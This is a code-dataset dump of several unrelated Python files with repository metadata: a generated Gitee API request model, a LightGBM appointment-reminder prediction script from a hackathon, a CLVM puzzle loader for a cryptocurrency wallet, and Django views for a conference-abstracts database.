noqa: E501 是否接受轻量级 pull request # noqa: E501 :return: The lightweight_pr_enabled of this Body19. 
# noqa: E501 :rtype: bool """ return self._lightweight_pr_enabled @lightweight_pr_enabled.setter def lightweight_pr_enabled(self, lightweight_pr_enabled): """Sets the lightweight_pr_enabled of this Body19. 是否接受轻量级 pull request # noqa: E501 :param lightweight_pr_enabled: The lightweight_pr_enabled of this Body19. # noqa: E501 :type: bool """ self._lightweight_pr_enabled = lightweight_pr_enabled def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value if issubclass(Body19, dict): for key, value in self.items(): result[key] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, Body19): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other
28.55489
117
0.592199
import pprint import re import six class Body19(object): swagger_types = { 'access_token': 'str', 'name': 'str', 'description': 'str', 'homepage': 'str', 'has_issues': 'bool', 'has_wiki': 'bool', 'can_comment': 'bool', 'issue_comment': 'bool', 'security_hole_enabled': 'bool', 'private': 'bool', 'path': 'str', 'default_branch': 'str', 'pull_requests_enabled': 'bool', 'online_edit_enabled': 'bool', 'lightweight_pr_enabled': 'bool' } attribute_map = { 'access_token': 'access_token', 'name': 'name', 'description': 'description', 'homepage': 'homepage', 'has_issues': 'has_issues', 'has_wiki': 'has_wiki', 'can_comment': 'can_comment', 'issue_comment': 'issue_comment', 'security_hole_enabled': 'security_hole_enabled', 'private': 'private', 'path': 'path', 'default_branch': 'default_branch', 'pull_requests_enabled': 'pull_requests_enabled', 'online_edit_enabled': 'online_edit_enabled', 'lightweight_pr_enabled': 'lightweight_pr_enabled' } def __init__(self, access_token=None, name=None, description=None, homepage=None, has_issues=True, has_wiki=True, can_comment=True, issue_comment=None, security_hole_enabled=None, private=None, path=None, default_branch=None, pull_requests_enabled=None, online_edit_enabled=None, lightweight_pr_enabled=None): self._access_token = None self._name = None self._description = None self._homepage = None self._has_issues = None self._has_wiki = None self._can_comment = None self._issue_comment = None self._security_hole_enabled = None self._private = None self._path = None self._default_branch = None self._pull_requests_enabled = None self._online_edit_enabled = None self._lightweight_pr_enabled = None self.discriminator = None if access_token is not None: self.access_token = access_token self.name = name if description is not None: self.description = description if homepage is not None: self.homepage = homepage if has_issues is not None: self.has_issues = has_issues if has_wiki is not None: self.has_wiki = has_wiki if can_comment is not None: 
self.can_comment = can_comment if issue_comment is not None: self.issue_comment = issue_comment if security_hole_enabled is not None: self.security_hole_enabled = security_hole_enabled if private is not None: self.private = private if path is not None: self.path = path if default_branch is not None: self.default_branch = default_branch if pull_requests_enabled is not None: self.pull_requests_enabled = pull_requests_enabled if online_edit_enabled is not None: self.online_edit_enabled = online_edit_enabled if lightweight_pr_enabled is not None: self.lightweight_pr_enabled = lightweight_pr_enabled @property def access_token(self): return self._access_token @access_token.setter def access_token(self, access_token): self._access_token = access_token @property def name(self): return self._name @name.setter def name(self, name): if name is None: raise ValueError("Invalid value for `name`, must not be `None`") self._name = name @property def description(self): return self._description @description.setter def description(self, description): self._description = description @property def homepage(self): return self._homepage @homepage.setter def homepage(self, homepage): self._homepage = homepage @property def has_issues(self): return self._has_issues @has_issues.setter def has_issues(self, has_issues): self._has_issues = has_issues @property def has_wiki(self): return self._has_wiki @has_wiki.setter def has_wiki(self, has_wiki): self._has_wiki = has_wiki @property def can_comment(self): return self._can_comment @can_comment.setter def can_comment(self, can_comment): self._can_comment = can_comment @property def issue_comment(self): return self._issue_comment @issue_comment.setter def issue_comment(self, issue_comment): self._issue_comment = issue_comment @property def security_hole_enabled(self): return self._security_hole_enabled @security_hole_enabled.setter def security_hole_enabled(self, security_hole_enabled): self._security_hole_enabled = security_hole_enabled 
@property def private(self): return self._private @private.setter def private(self, private): self._private = private @property def path(self): return self._path @path.setter def path(self, path): self._path = path @property def default_branch(self): return self._default_branch @default_branch.setter def default_branch(self, default_branch): self._default_branch = default_branch @property def pull_requests_enabled(self): return self._pull_requests_enabled @pull_requests_enabled.setter def pull_requests_enabled(self, pull_requests_enabled): self._pull_requests_enabled = pull_requests_enabled @property def online_edit_enabled(self): return self._online_edit_enabled @online_edit_enabled.setter def online_edit_enabled(self, online_edit_enabled): self._online_edit_enabled = online_edit_enabled @property def lightweight_pr_enabled(self): return self._lightweight_pr_enabled @lightweight_pr_enabled.setter def lightweight_pr_enabled(self, lightweight_pr_enabled): self._lightweight_pr_enabled = lightweight_pr_enabled def to_dict(self): result = {} for attr, _ in six.iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value if issubclass(Body19, dict): for key, value in self.items(): result[key] = value return result def to_str(self): return pprint.pformat(self.to_dict()) def __repr__(self): return self.to_str() def __eq__(self, other): if not isinstance(other, Body19): return False return self.__dict__ == other.__dict__ def __ne__(self, other): return not self == other
true
true
f705e8c12e46c20739a33fd39e478184c2fdb15c
4,875
py
Python
sigma_script.py
bettybhzhou/EasyMarkit_AI
028824a0af246d232013246bf1784013921beec3
[ "MIT" ]
2
2019-04-13T23:31:10.000Z
2019-04-14T00:45:43.000Z
sigma_script.py
pak-alex/EasyMarkit_AI
028824a0af246d232013246bf1784013921beec3
[ "MIT" ]
null
null
null
sigma_script.py
pak-alex/EasyMarkit_AI
028824a0af246d232013246bf1784013921beec3
[ "MIT" ]
3
2019-04-13T23:31:16.000Z
2019-04-20T01:30:54.000Z
""" Winning Python script for EasyMarkit Hackathon by Team Sigma """ ##Team Sigma - Members: Betty Zhou, Bailey Lei, Alex Pak # Usage: python sigma_script.py data/train.csv data/test.csv # import any necessary packages here #loading libraries import argparse import os import pandas as pd import numpy as np import sklearn from sklearn.model_selection import train_test_split import lightgbm as lgb # read in command line arguments parser = argparse.ArgumentParser() parser.add_argument("train_file_path") #path of training set parser.add_argument("test_file_path") #path of test set args = parser.parse_args() def onehot_drop(df, column_name): for index in column_name: one_hot = pd.get_dummies(df[index], prefix = index) df = df.drop(index,axis = 1) df = df.join(one_hot) return df def fit_train(df): train_df = df train_clean = onehot_drop(train_df, ['type', 'province']) train_clean['cli_area'] = train_clean['cli_area'].map({'Urban':1, 'Rural':0}) train_clean['pat_area'] = train_clean['pat_area'].map({'Urban':1, 'Rural':0}) train_clean['gender'] = train_clean['gender'].map({'M':1, 'F':0}) # convert to datetime train_clean['apt_date'] = pd.to_datetime(train_df.apt_date,format='%Y-%m-%d %H:%M:%S', utc =True) train_clean['sent_time'] = pd.to_datetime(train_df.sent_time,format='%Y-%m-%d %H:%M', utc =True) train_clean['send_time'] = pd.to_datetime(train_df.send_time, format='%H:%M:%S', utc =True).dt.time # find time between reminder and appointment train_clean['sent_to_apt'] = (train_clean['apt_date'] - train_clean['sent_time']).dt.total_seconds()/3600 # attributes train_clean['apt_month'] = train_clean['apt_date'].dt.month train_clean['sent_day_of_week'] = train_clean['sent_time'].dt.day_name() # one-hot encoding train_clean = onehot_drop(train_clean, ['sent_day_of_week']) X = train_clean.iloc[:, 2:] y = train_clean.iloc[:,1] X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=0.8, random_state=1) X_train_drop = X_train.drop(["apt_type", "apt_date", 
"sent_time", "send_time", "city", "cli_zip", 'pat_id', 'family_id','clinic'], axis = 1) X_test_drop = X_test.drop(["apt_type", "apt_date", "sent_time", "send_time", "city", "cli_zip", 'pat_id', 'family_id','clinic'], axis = 1) print("Number of training examples:", len(y_train)) print("Number of test examples:", len(y_test)) lg = lgb.LGBMClassifier(silent=False, n_estimators = 2000, max_depth=100) lg_model = lg.fit(X_train_drop, y_train) print("train accuracy: ", lg.score(X_train_drop, y_train)) print("test accuracy: ", lg.score(X_test_drop, y_test)) return lg_model def predict_test(test_df, lg_model): test_clean = onehot_drop(test_df, ['type', 'province']) test_clean['cli_area'] = test_clean['cli_area'].map({'Urban':1, 'Rural':0}) test_clean['pat_area'] = test_clean['pat_area'].map({'Urban':1, 'Rural':0}) test_clean['gender'] = test_clean['gender'].map({'M':1, 'F':0}) # convert to datetime test_clean['apt_date'] = pd.to_datetime(test_df.apt_date,format='%Y-%m-%d %H:%M:%S', utc =True) test_clean['sent_time'] = pd.to_datetime(test_df.sent_time,format='%Y-%m-%d %H:%M', utc =True) test_clean['send_time'] = pd.to_datetime(test_df.send_time, format='%H:%M:%S', utc =True).dt.time # find time between reminder and appointment test_clean['sent_to_apt'] = (test_clean['apt_date'] - test_clean['sent_time']).dt.total_seconds()/3600 # attributes test_clean['apt_month'] = test_clean['apt_date'].dt.month test_clean['sent_day_of_week'] = test_clean['sent_time'].dt.day_name() # one-hot encoding test_clean = onehot_drop(test_clean, ['sent_day_of_week']) test_clean_month = onehot_drop(test_clean, ['apt_month']) test_final = test_clean.iloc[:, 1:] test_final = test_final.drop(["apt_type", "apt_date", "sent_time", "send_time", "city", "cli_zip", 'pat_id', 'family_id','clinic'], axis = 1) print("Number of test examples:", len(test_df)) print("Number of final cleaned test examples:", len(test_final)) print("test data shape: ", test_final.shape) test_clean["response"] = 
lg_model.predict(test_final) df = test_clean[["ReminderId","response"]] return df def write_to_csv(df): group_name = "sigma" df.to_csv(group_name + "_output.csv", index=False) print(group_name + "_output.csv output successful") def main(): # loading train and test data train_df = pd.read_csv(args.train_file_path) test_df = pd.read_csv(args.test_file_path) # pre-processing input train and test data for training model lg_model = fit_train(train_df) #predict and write to new CSV for submission df = predict_test(test_df, lg_model) write_to_csv(df) if __name__ == "__main__": main()
38.385827
145
0.690051
port numpy as np import sklearn from sklearn.model_selection import train_test_split import lightgbm as lgb parser = argparse.ArgumentParser() parser.add_argument("train_file_path") parser.add_argument("test_file_path") args = parser.parse_args() def onehot_drop(df, column_name): for index in column_name: one_hot = pd.get_dummies(df[index], prefix = index) df = df.drop(index,axis = 1) df = df.join(one_hot) return df def fit_train(df): train_df = df train_clean = onehot_drop(train_df, ['type', 'province']) train_clean['cli_area'] = train_clean['cli_area'].map({'Urban':1, 'Rural':0}) train_clean['pat_area'] = train_clean['pat_area'].map({'Urban':1, 'Rural':0}) train_clean['gender'] = train_clean['gender'].map({'M':1, 'F':0}) train_clean['apt_date'] = pd.to_datetime(train_df.apt_date,format='%Y-%m-%d %H:%M:%S', utc =True) train_clean['sent_time'] = pd.to_datetime(train_df.sent_time,format='%Y-%m-%d %H:%M', utc =True) train_clean['send_time'] = pd.to_datetime(train_df.send_time, format='%H:%M:%S', utc =True).dt.time train_clean['sent_to_apt'] = (train_clean['apt_date'] - train_clean['sent_time']).dt.total_seconds()/3600 train_clean['apt_month'] = train_clean['apt_date'].dt.month train_clean['sent_day_of_week'] = train_clean['sent_time'].dt.day_name() train_clean = onehot_drop(train_clean, ['sent_day_of_week']) X = train_clean.iloc[:, 2:] y = train_clean.iloc[:,1] X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=0.8, random_state=1) X_train_drop = X_train.drop(["apt_type", "apt_date", "sent_time", "send_time", "city", "cli_zip", 'pat_id', 'family_id','clinic'], axis = 1) X_test_drop = X_test.drop(["apt_type", "apt_date", "sent_time", "send_time", "city", "cli_zip", 'pat_id', 'family_id','clinic'], axis = 1) print("Number of training examples:", len(y_train)) print("Number of test examples:", len(y_test)) lg = lgb.LGBMClassifier(silent=False, n_estimators = 2000, max_depth=100) lg_model = lg.fit(X_train_drop, y_train) print("train accuracy: ", 
lg.score(X_train_drop, y_train)) print("test accuracy: ", lg.score(X_test_drop, y_test)) return lg_model def predict_test(test_df, lg_model): test_clean = onehot_drop(test_df, ['type', 'province']) test_clean['cli_area'] = test_clean['cli_area'].map({'Urban':1, 'Rural':0}) test_clean['pat_area'] = test_clean['pat_area'].map({'Urban':1, 'Rural':0}) test_clean['gender'] = test_clean['gender'].map({'M':1, 'F':0}) test_clean['apt_date'] = pd.to_datetime(test_df.apt_date,format='%Y-%m-%d %H:%M:%S', utc =True) test_clean['sent_time'] = pd.to_datetime(test_df.sent_time,format='%Y-%m-%d %H:%M', utc =True) test_clean['send_time'] = pd.to_datetime(test_df.send_time, format='%H:%M:%S', utc =True).dt.time test_clean['sent_to_apt'] = (test_clean['apt_date'] - test_clean['sent_time']).dt.total_seconds()/3600 test_clean['apt_month'] = test_clean['apt_date'].dt.month test_clean['sent_day_of_week'] = test_clean['sent_time'].dt.day_name() test_clean = onehot_drop(test_clean, ['sent_day_of_week']) test_clean_month = onehot_drop(test_clean, ['apt_month']) test_final = test_clean.iloc[:, 1:] test_final = test_final.drop(["apt_type", "apt_date", "sent_time", "send_time", "city", "cli_zip", 'pat_id', 'family_id','clinic'], axis = 1) print("Number of test examples:", len(test_df)) print("Number of final cleaned test examples:", len(test_final)) print("test data shape: ", test_final.shape) test_clean["response"] = lg_model.predict(test_final) df = test_clean[["ReminderId","response"]] return df def write_to_csv(df): group_name = "sigma" df.to_csv(group_name + "_output.csv", index=False) print(group_name + "_output.csv output successful") def main(): train_df = pd.read_csv(args.train_file_path) test_df = pd.read_csv(args.test_file_path) lg_model = fit_train(train_df) df = predict_test(test_df, lg_model) write_to_csv(df) if __name__ == "__main__": main()
true
true
f705e901b5b26c21aca2813bb5122e2cd9fef07b
1,541
py
Python
hddcoin/wallet/puzzles/load_clvm.py
JakubSido/hddcoin-blockchain
7b9da03edee3512295c0f142c07c4759512ccbca
[ "Apache-2.0" ]
null
null
null
hddcoin/wallet/puzzles/load_clvm.py
JakubSido/hddcoin-blockchain
7b9da03edee3512295c0f142c07c4759512ccbca
[ "Apache-2.0" ]
null
null
null
hddcoin/wallet/puzzles/load_clvm.py
JakubSido/hddcoin-blockchain
7b9da03edee3512295c0f142c07c4759512ccbca
[ "Apache-2.0" ]
null
null
null
import pathlib import pkg_resources from clvm_tools.clvmc import compile_clvm from hddcoin.types.blockchain_format.program import Program, SerializedProgram def load_serialized_clvm(clvm_filename, package_or_requirement=__name__) -> SerializedProgram: """ This function takes a .clvm file in the given package and compiles it to a .clvm.hex file if the .hex file is missing or older than the .clvm file, then returns the contents of the .hex file as a `Program`. clvm_filename: file name package_or_requirement: usually `__name__` if the clvm file is in the same package """ hex_filename = f"{clvm_filename}.hex" try: if pkg_resources.resource_exists(package_or_requirement, clvm_filename): full_path = pathlib.Path(pkg_resources.resource_filename(package_or_requirement, clvm_filename)) output = full_path.parent / hex_filename compile_clvm(full_path, output, search_paths=[full_path.parent]) except NotImplementedError: # pyinstaller doesn't support `pkg_resources.resource_exists` # so we just fall through to loading the hex clvm pass clvm_hex = pkg_resources.resource_string(package_or_requirement, hex_filename).decode("utf8") clvm_blob = bytes.fromhex(clvm_hex) return SerializedProgram.from_bytes(clvm_blob) def load_clvm(clvm_filename, package_or_requirement=__name__) -> Program: return Program.from_bytes(bytes(load_serialized_clvm(clvm_filename, package_or_requirement=package_or_requirement)))
40.552632
120
0.761843
import pathlib import pkg_resources from clvm_tools.clvmc import compile_clvm from hddcoin.types.blockchain_format.program import Program, SerializedProgram def load_serialized_clvm(clvm_filename, package_or_requirement=__name__) -> SerializedProgram: hex_filename = f"{clvm_filename}.hex" try: if pkg_resources.resource_exists(package_or_requirement, clvm_filename): full_path = pathlib.Path(pkg_resources.resource_filename(package_or_requirement, clvm_filename)) output = full_path.parent / hex_filename compile_clvm(full_path, output, search_paths=[full_path.parent]) except NotImplementedError: # so we just fall through to loading the hex clvm pass clvm_hex = pkg_resources.resource_string(package_or_requirement, hex_filename).decode("utf8") clvm_blob = bytes.fromhex(clvm_hex) return SerializedProgram.from_bytes(clvm_blob) def load_clvm(clvm_filename, package_or_requirement=__name__) -> Program: return Program.from_bytes(bytes(load_serialized_clvm(clvm_filename, package_or_requirement=package_or_requirement)))
true
true
f705e9a1b90c904ee70c6e8914a78070d0f5ea06
101,873
py
Python
dh_abstracts/app/abstracts/views.py
cmu-lib/dhweb_app
dcfc94b8df67e2a17c882b432fdeb52cfd98bf16
[ "MIT" ]
3
2021-05-07T17:01:33.000Z
2022-01-08T07:54:22.000Z
dh_abstracts/app/abstracts/views.py
cmu-lib/dhweb_app
dcfc94b8df67e2a17c882b432fdeb52cfd98bf16
[ "MIT" ]
336
2019-12-04T23:06:08.000Z
2022-03-31T16:23:15.000Z
dh_abstracts/app/abstracts/views.py
cmu-lib/dhweb_app
dcfc94b8df67e2a17c882b432fdeb52cfd98bf16
[ "MIT" ]
null
null
null
from django.shortcuts import render
from django.http import HttpResponse, JsonResponse, StreamingHttpResponse, FileResponse
from django.template import loader
from django.shortcuts import get_object_or_404, render, redirect
from django.views import View
from django.views.generic import DetailView, ListView
from django.db.models import (
    Count,
    Max,
    Min,
    Q,
    F,
    Prefetch,
    Subquery,
    OuterRef,
    ExpressionWrapper,
    FloatField,
    BooleanField,
)
from django.db.models.functions import Concat, FirstValue, Cast
from django.core import management
from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator
from django.db.models.functions import Coalesce
from django.contrib.postgres.search import SearchRank, SearchQuery
from django.contrib.postgres.aggregates import StringAgg
from django.urls import reverse, reverse_lazy
from django.contrib import messages
from django.contrib.messages.views import SuccessMessageMixin
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.contrib.auth.decorators import login_required, user_passes_test
from dal.autocomplete import Select2QuerySetView
from django.views.generic.edit import CreateView, DeleteView, UpdateView
from django.db import transaction, IntegrityError
from django.forms.models import model_to_dict
from django.forms import formset_factory, inlineformset_factory, modelformset_factory
from django.conf import settings
from django.utils.html import format_html
from django.views.decorators.cache import cache_page

import glob
from os.path import basename, getmtime
from datetime import datetime
import csv
import sys
from operator import attrgetter
from tempfile import NamedTemporaryFile, TemporaryDirectory
import zipfile

# The bare module import is used by download_data() to look models up by
# dotted name via operator.attrgetter.
from . import models
from .models import (
    Work,
    WorkType,
    Author,
    Conference,
    Institution,
    Appellation,
    Affiliation,
    ConferenceSeries,
    SeriesMembership,
    Organizer,
    Country,
    Keyword,
    Topic,
    Language,
    CountryLabel,
    Authorship,
    License,
)
from .forms import (
    WorkFilter,
    AuthorFilter,
    AuthorMergeForm,
    WorkForm,
    WorkAuthorshipForm,
    FullInstitutionForm,
    InstitutionMergeForm,
    AffiliationEditForm,
    AffiliationMergeForm,
    KeywordMergeForm,
    TagForm,
    TopicMergeForm,
    AffiliationMultiMergeForm,
    KeywordMultiMergeForm,
    ConferenceForm,
    ConferenceCheckoutForm,
    ConferenceSeriesInline,
    LanguageMergeForm,
    WorkTypeMergeForm,
    InstitutionMultiMergeForm,
    TopicMultiMergeForm,
    ConferenceXMLUploadForm,
)

# Shown to logged-in, non-staff users who try to reach an editing view.
PERMISSIONS_ERROR_TEXT = (
    "Please contact the lead project editors to edit this part of the database."
)


def cache_for_anon(func):
    """
    On these views, call the cache if the user is not authenticated
    """

    def wrap(request, *args, **kwargs):
        if request.user.is_authenticated:
            # Authenticated users always get a fresh render.
            return func(request, *args, **kwargs)
        else:
            # Anonymous traffic is served through Django's per-view cache,
            # using the default cache backend's TIMEOUT setting.
            return cache_page(settings.CACHES["default"]["TIMEOUT"])(func)(
                request, *args, **kwargs
            )

    return wrap


def user_is_staff(func):
    """Decorator for function views: require login, then require staff.

    Anonymous users are bounced to the login page with a ?next= return URL;
    authenticated non-staff users get a warning message and a redirect home.
    """

    def wrap(request, *args, **kwargs):
        if not request.user.is_authenticated:
            return redirect(f"{reverse('login')}?next={request.path}")
        if request.user.is_staff:
            return func(request, *args, **kwargs)
        else:
            messages.warning(request, PERMISSIONS_ERROR_TEXT)
            return redirect("home_view")

    return wrap


class StaffRequiredMixin:
    """Class-based-view counterpart of the user_is_staff decorator."""

    def dispatch(self, *args, **kwargs):
        if not self.request.user.is_authenticated:
            return redirect(f"{reverse('login')}?next={self.request.path}")
        if self.request.user.is_staff:
            return super().dispatch(*args, **kwargs)
        else:
            messages.warning(self.request, PERMISSIONS_ERROR_TEXT)
            return redirect("home_view")


class ItemLabelAutocomplete(Select2QuerySetView):
    """Base autocomplete: render the selected value like a dropdown result."""

    def get_selected_result_label(self, item):
        return self.get_result_label(item)


class WorkAutocomplete(ItemLabelAutocomplete):
    # 403 rather than an empty result set for unauthenticated callers.
    raise_exception = True

    def get_queryset(self):
        qs = Work.objects.all()
        # The form can forward "parents_only"/"conference" to narrow the
        # candidate works (e.g. when picking a parent session).
        parents_only = self.forwarded.get("parents_only", None)
        if parents_only:
            qs = qs.filter(work_type__is_parent=True)
        conference = self.forwarded.get("conference", None)
        if conference:
            qs = qs.filter(conference=conference)
        if self.q:
            qs = qs.filter(title__icontains=self.q)
        return qs.all()


class AppellationAutocomplete(ItemLabelAutocomplete):
    raise_exception = True

    def get_queryset(self):
        qs = Appellation.objects.all()
        if self.q:
            qs = qs.filter(
                Q(first_name__icontains=self.q) | Q(last_name__icontains=self.q)
            ).all()
        return qs


class KeywordAutocomplete(ItemLabelAutocomplete):
    raise_exception = True

    def get_queryset(self):
        # Most-used keywords first.
        qs = Keyword.objects.annotate(n_works=Count("works")).order_by("-n_works")
        if self.q:
            qs = qs.filter(title__icontains=self.q).all()
        return qs

    def get_result_label(self, item):
        return f"{item} ({item.n_works} works)"


class LanguageAutocomplete(ItemLabelAutocomplete):
    raise_exception = True

    def get_queryset(self):
        qs = Language.objects.annotate(n_works=Count("works")).order_by(
            "-n_works", "title"
        )
        if self.q:
            qs = qs.filter(title__icontains=self.q).all()
        return qs

    def get_result_label(self, item):
        return f"{item} ({item.n_works} works)"


class TopicAutocomplete(ItemLabelAutocomplete):
    raise_exception = True

    def get_queryset(self):
        qs = Topic.objects.annotate(n_works=Count("works")).order_by("-n_works")
        if self.q:
            qs = qs.filter(title__icontains=self.q).all()
        return qs

    def get_result_label(self, item):
        return f"{item} ({item.n_works} works)"


class CountryAutocomplete(ItemLabelAutocomplete):
    raise_exception = True

    def get_queryset(self):
        qs = Country.objects.annotate(
            n_works=Count(
                "institutions__affiliations__asserted_by__work", distinct=True
            )
        ).order_by("-n_works")
        if self.q:
            # Match either the preferred name or any alternate name.
            qs = qs.filter(
                Q(pref_name__icontains=self.q) | Q(names__name__icontains=self.q)
            )
        return qs.distinct()

    def get_result_label(self, item):
        return f"{item} ({item.n_works} works)"


class InstitutionAutocomplete(ItemLabelAutocomplete):
    raise_exception = True

    def get_queryset(self):
        qs = (
            Institution.objects.annotate(
                n_works=Count("affiliations__asserted_by__work", distinct=True)
            )
            .select_related("country")
            .order_by("-n_works")
        )
        if self.q:
            qs = qs.filter(name__icontains=self.q).all()
        return qs

    def get_result_label(self, item):
        if item.country is not None:
            c_label = item.country.pref_name
        else:
            c_label = ""
        # Join only the non-empty location parts, e.g. "Ontario, Canada".
        location_statement = ", ".join(
            [l for l in [item.state_province_region, c_label] if l != ""]
        )
        return f"{item} ({item.n_works} works)<br><small text-class='muted'>{location_statement}</small>"


class AffiliationAutocomplete(ItemLabelAutocomplete):
    raise_exception = True

    def get_queryset(self):
        qs = (
            Affiliation.objects.annotate(
                n_works=Count("asserted_by__work", distinct=True)
            )
            .select_related("institution", "institution__country")
            .order_by("-n_works")
        )
        # Optionally restricted to one institution forwarded by the form.
        inst_filter = self.forwarded.get("institution", None)
        if inst_filter:
            qs = qs.filter(institution=inst_filter)
        if self.q:
            qs = qs.filter(
                Q(department__icontains=self.q) | Q(institution__name__icontains=self.q)
            ).distinct()
        return qs

    def get_result_label(self, item):
        if item.institution.country is not None:
            c_label = item.institution.country.pref_name
        else:
            c_label = ""
        location_statement = ", ".join(
            [l for l in [item.institution.state_province_region, c_label] if l != ""]
        )
        return f"{item} ({item.n_works} works)<br><small text-class='muted'>{location_statement}</small>"


class ConferenceAutocomplete(ItemLabelAutocomplete):
    raise_exception = True

    def get_queryset(self):
        qs = Conference.objects.annotate(
            main_series=StringAgg(
                "series_memberships__series__abbreviation",
                delimiter=" / ",
                distinct=True,
            )
        ).order_by("year", "main_series", "short_title", "theme_title")
        if self.q:
            qs = qs.filter(search_text__icontains=self.q).distinct()
        return qs

    def get_result_label(self, item):
        # Prefer "SERIES - year - title"; fall back to theme title.
        if item.main_series:
            return f"{item.main_series} - {item.year} - {item.short_title}"
        elif item.short_title:
            return f"{item.year} - {item.short_title}"
        else:
            return f"{item.year} - {item.theme_title}"


class AuthorAutocomplete(ItemLabelAutocomplete):
    raise_exception = True

    def get_queryset(self):
        qs = Author.objects.annotate(
            n_works=Count("authorships", distinct=True),
            main_last_name=Max("appellations__last_name"),
            main_first_name=Max("appellations__first_name"),
        ).order_by("main_last_name", "main_first_name", "-n_works")
        if self.q:
            # appellations_index aggregates every name variant for the author.
            qs = qs.filter(appellations_index__icontains=self.q).distinct()
        return qs

    def get_result_label(self, item):
        return format_html(
            f"{item.most_recent_appellation} ({item.n_works} works)<br><small text-class='muted'>(All names: {item.appellations_index})</small>"
        )


def work_view(request, work_id):
    """Render one work's detail page with its conference, session links, and
    ordered authorships (affiliations prefetched to avoid N+1 queries)."""
    related_conference = Conference.objects.annotate(
        n_works=Count("works", distinct=True),
        n_authors=Count("works__authors", distinct=True),
        main_series=StringAgg(
            "series_memberships__series__abbreviation", delimiter=" / ", distinct=True
        ),
    ).prefetch_related("series", "organizers")
    work = get_object_or_404(
        Work.objects.select_related("work_type", "full_text_license").prefetch_related(
            Prefetch("conference", queryset=related_conference),
            "keywords",
            "topics",
            "languages",
            Prefetch(
                "session_papers",
                queryset=Work.objects.prefetch_related(
                    Prefetch(
                        "authorships",
                        queryset=Authorship.objects.select_related("appellation"),
                    ),
                ),
            ),
            Prefetch(
                "parent_session",
                queryset=Work.objects.prefetch_related(
                    Prefetch(
                        "authorships",
                        queryset=Authorship.objects.select_related(
                            "author", "appellation"
                        ),
                    )
                ),
            ),
        ),
        pk=work_id,
    )
    authorships = (
        Authorship.objects.filter(work_id=work_id)
        .order_by("authorship_order")
        .distinct()
        .select_related("work", "author", "appellation")
        .prefetch_related(
            Prefetch(
                "affiliations",
                queryset=Affiliation.objects.select_related(
                    "institution", "institution__country"
                ),
            )
        )
    )
    context = {"work": work, "authorships": authorships}
    return render(request, "work_detail.html", context)


def author_view(request, author_id):
    """Render one author's page: works in chronological order, plus name and
    affiliation histories ordered by the most recent year asserted."""
    author = get_object_or_404(Author, pk=author_id)
    sorted_authorships = (
        Authorship.objects.filter(author=author)
        .order_by("work__conference__year")
        .prefetch_related(
            Prefetch("work", queryset=Work.objects.select_related("conference"))
        )
    )
    appellations = (
        Appellation.objects.filter(asserted_by__author=author)
        .distinct()
        .annotate(latest_year=Max("asserted_by__work__conference__year"))
        .order_by("-latest_year")
        .prefetch_related(Prefetch("asserted_by", queryset=sorted_authorships))
    )
    affiliations = (
        Affiliation.objects.filter(asserted_by__author=author)
        .distinct()
        .annotate(latest_year=Max("asserted_by__work__conference__year"))
        .order_by("-latest_year")
        .prefetch_related(
            Prefetch("asserted_by", queryset=sorted_authorships),
            Prefetch(
                "institution", queryset=Institution.objects.select_related("country")
            ),
        )
    )
    works = (
        Work.objects.filter(authorships__author=author)
        .order_by("conference__year")
        .distinct()
        .select_related("conference", "parent_session", "work_type")
        .prefetch_related(
            Prefetch(
                "conference",
                queryset=Conference.objects.prefetch_related("series", "organizers"),
            ),
            "session_papers",
            "keywords",
            "topics",
            "languages",
            Prefetch(
                "authorships",
                queryset=Authorship.objects.select_related("appellation", "author"),
            ),
        )
    )
    author_admin_page = reverse("admin:abstracts_author_change", args=(author.pk,))
    context = {
        "author": author,
        "works": works,
        "appellations": appellations,
        "affiliations": affiliations,
        "author_admin_page": author_admin_page,
    }
    return render(request, "author_detail.html", context)


class AuthorSplit(DetailView, StaffRequiredMixin):
    """Staff view to split selected authorships off into a brand-new author."""

    model = Author
    template_name = "author_split.html"
    context_object_name = "original_author"

    def get_context_data(self, **kwargs):
        authorships = Authorship.objects.filter(author=self.get_object()).order_by(
            "work__conference__year"
        )
        return {self.context_object_name: self.get_object(), "authorships": authorships}

    @transaction.atomic
    def post(self, request, *args, **kwargs):
        """
        Create new author and transfer authorships
        """
        authorships_to_move = request.POST.getlist("splitselect")
        try:
            new_author =
Author.objects.create() Authorship.objects.filter(id__in=authorships_to_move).update( author=new_author ) # Force-update appellations self.get_object().save() new_author.save() messages.success( request, f"{len(authorships_to_move)} authorships moved to new author id {new_author.id}", ) return redirect("author_detail", new_author.id) except: messages.error(request, str(authorships_to_move)) return redirect("author_split", self.get_object().id) class XMLView(DetailView, LoginRequiredMixin): model = Work context_object_name = "work" def get(self, request, *args, **kwargs): response = HttpResponse(self.get_object().full_text, content_type="xhtml+xml") response[ "Content-Disposition" ] = f"attachment; filename={self.get_object().id}.xml" return response class AuthorList(ListView): context_object_name = "author_list" template_name = "author_list.html" paginate_by = 50 def get_queryset(self): base_result_set = Author.objects.exclude(appellations__isnull=True).annotate( n_conferences=Count("works__conference", distinct=True) ) raw_filter_form = AuthorFilter(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data order_res = filter_form["ordering"] if order_res is None or order_res == "": order_res = "last_name" result_set = base_result_set.annotate( last_name=Max("appellations__last_name"), n_works=Count("authorships", distinct=True), ).order_by(order_res) author_res = filter_form["author"] if author_res is not None: result_set = 